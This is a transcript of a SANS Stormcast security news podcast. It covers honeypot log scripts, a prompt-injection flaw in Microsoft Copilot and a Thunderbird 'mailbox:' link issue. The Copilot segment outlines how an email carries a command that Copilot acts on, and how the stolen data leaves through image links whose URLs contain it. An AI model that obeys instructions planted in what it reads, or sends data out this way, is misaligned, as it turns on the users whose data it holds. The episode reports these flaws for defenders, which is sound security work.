Hello and welcome to the Friday, June 13th, 2025
edition of the SANS Internet Storm Center's Stormcast. My
name is Johannes Ullrich, and this episode brought to you by
the SANS.edu Undergraduate Certificate Program in
Cybersecurity Fundamentals is recorded in Jacksonville,
Florida. Well, in diaries today we have yet another
diary by one of our undercredit interns. This time
William Constantino is looking into scripts that he wrote in
order to summarize data from the DShield honeypot. Of
course, we have shown scripts like this before, and when
you're looking at the diary, I don't want you to look at it
with sort of the lens where you say, hey, how am I using
this script for myself? I think what's sometimes more
useful is to look at it, how could I create a script like
this, and which ideas from William's script may actually
apply to my particular use case. So look at what kind of
data William extracted from the honeypot here. Is this
useful to you or not? And then also how some of the details
were implemented in these scripts, and that's, I think,
a better way to look at it. Creating these scripts
yourself sometimes has a real great sort of educational
value, not just with respect to learning how to script, but
also sifting through data yourself, looking at some of
the oddities in the data and such. You're really becoming
way more familiar with the data as a result, and as a
result also better in actually extracting useful artifacts
from these logs.
So the way the attack works is that an attacker starts out by
sending an email. That email now basically includes a
command that it wants the copilot to execute. Now it's
not directly addressed at the copilot. It's addressed at the
user. But that's again sort of where copilot gets confused,
and that's where the real sort of issue happens, where now an
attacker is able to basically control copilot. Now the next
part is then all about trying to exfiltrate the data, and
that's done by actually inserting image links into the
response. And part of the URL is then the data that's being
exfiltrated. That also basically then requires taking
advantage of a couple other weaknesses in how these links
are created and constrained. Interesting vulnerability, and
yes, this particular issue has been fixed by Microsoft. But
overall, of course, this is more sort of one of those
fundamental problems that probably exists in many
similar systems. And we've got an interesting vulnerability
in Thunderbird. It's not the most critical vulnerability. I
think they actually only rated as medium, but I think it sort
of also follows good follow-up to yesterday's vulnerability
in KDE with Telnet links. This time it's mailbox links. So
links starting with mailbox colon and then three slashes.
Triggers apparently an unsolicited download of
whatever document is then being listed after this
mailbox colon protocol indicator. And that can, first
of all, be abused to basically just load a malicious PDF to
the user's desktop. It can also be used to trick the
system then to reach out via SMB, which then gets us back
to the usual credential leakage. So a bunch of
different options here available. And something that
I don't quite think that medium quite covers it really
well. This is something where, again, the creativity of the
attacker will have a large part in how this may
potentially be exploited. And certainly don't forget to
update Thunderbird if you're using it as your email client.
Well, and that's it for today. So thanks for listening.
Thanks for any feedback that you have. Please email or send
me via other means. And thanks for any good reviews that
you'll leave in your favorite podcast platform. Next week, I
will not have a podcast on Wednesday and Thursday due to
some personal travel. But Monday, Tuesday, Friday should
just work as usual. So talk to you again on Monday. Bye.
